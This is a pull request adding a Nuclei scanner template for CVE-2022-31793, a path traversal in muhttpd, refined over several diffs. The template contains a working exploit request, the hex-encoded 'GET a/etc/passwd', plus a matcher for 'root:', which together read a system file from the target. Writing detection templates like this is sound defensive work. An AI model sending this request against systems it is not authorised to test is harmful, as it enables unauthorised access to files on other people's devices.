### PR TITLE
Create CVE-2022-31793.yaml

### DIFF
--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@@ -1,0 +1,33 @@
+id: CVE-2022-31793
+
+info:
+  name: muhttpd <= 1.1.5 - Path traversal
+  author: scent2d
+  severity: 
+  description: |
+    A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
+  reference:
+    - https://derekabdine.com/blog/2022-arris-advisory.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: CVE-2022-31793
+    cwe-id: 
+  tags: cve,cve2022,muhttpd,lfi,unauthenticated
+
+network:
+  - host:
+    - "{{Hostname}}"
+    inputs:
+      - data: "47455420612F6574632F706173737764" # GET a/etc/passwd
+        type: hex
+      - data: "\n\n"
+
+    read-size: 128
+    matchers:
+      - type: word
+        encoding: hex
+        words:
+          - "726f6f743a" # root:
+        part: body

--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@@ -3,24 +3,24 @@ id: CVE-2022-31793
 info:
   name: muhttpd <= 1.1.5 - Path traversal
   author: scent2d
-  severity: 
+  severity: unknown
   description: |
     A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
   reference:
     - https://derekabdine.com/blog/2022-arris-advisory.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
   classification:
-    cvss-metrics: 
-    cvss-score: 
+    cvss-metrics: unknown
+    cvss-score: 0.0
     cve-id: CVE-2022-31793
-    cwe-id: 
+    cwe-id: unknown
   tags: cve,cve2022,muhttpd,lfi,unauthenticated
 
 network:
   - host:
-    - "{{Hostname}}"
+      - "{{Hostname}}"
     inputs:
-      - data: "47455420612F6574632F706173737764" # GET a/etc/passwd
+      - data: "47455420612F6574632F706173737764"
         type: hex
       - data: "\n\n"
 
@@ -29,5 +29,5 @@ network:
       - type: word
         encoding: hex
         words:
-          - "726f6f743a" # root:
+          - "726f6f743a"
         part: body

--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@@ -9,12 +9,8 @@ info:
   reference:
     - https://derekabdine.com/blog/2022-arris-advisory.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
-  classification:
-    cvss-metrics: unknown
-    cvss-score: 0.0
-    cve-id: CVE-2022-31793
-    cwe-id: unknown
-  tags: cve,cve2022,muhttpd,lfi,unauthenticated
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
+  tags: cve,cve2022,muhttpd,lfi,unauth
 
 network:
   - host:

--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@@ -3,18 +3,21 @@ id: CVE-2022-31793
 info:
   name: muhttpd <= 1.1.5 - Path traversal
   author: scent2d
-  severity: unknown
+  severity: high
   description: |
     A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
   reference:
     - https://derekabdine.com/blog/2022-arris-advisory.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
     - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
-  tags: cve,cve2022,muhttpd,lfi,unauth
+  metadata:
+    verified: true
+  tags: cve,cve2022,network,muhttpd,lfi,unauth
 
 network:
   - host:
       - "{{Hostname}}"
+
     inputs:
       - data: "47455420612F6574632F706173737764"
         type: hex
@@ -23,7 +26,7 @@ network:
     read-size: 128
     matchers:
       - type: word
+        part: body
         encoding: hex
         words:
           - "726f6f743a"
-        part: body


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2022-31793
- References: https://derekabdine.com/blog/2022-arris-advisory

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
![image](https://user-images.githubusercontent.com/45614318/182024204-69bbc47b-3e2b-44a5-8068-d1dfdb3af7e6.png)
![image](https://user-images.githubusercontent.com/45614318/182024225-69994a20-e9c2-4b3a-b59c-ed3ce050e113.png)

- CVE-2022-31793 Vulnerability Details Not yet Published. For this reason, the severity, cvss-metrics, cvss-score, and cwe-id information were empty.


<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)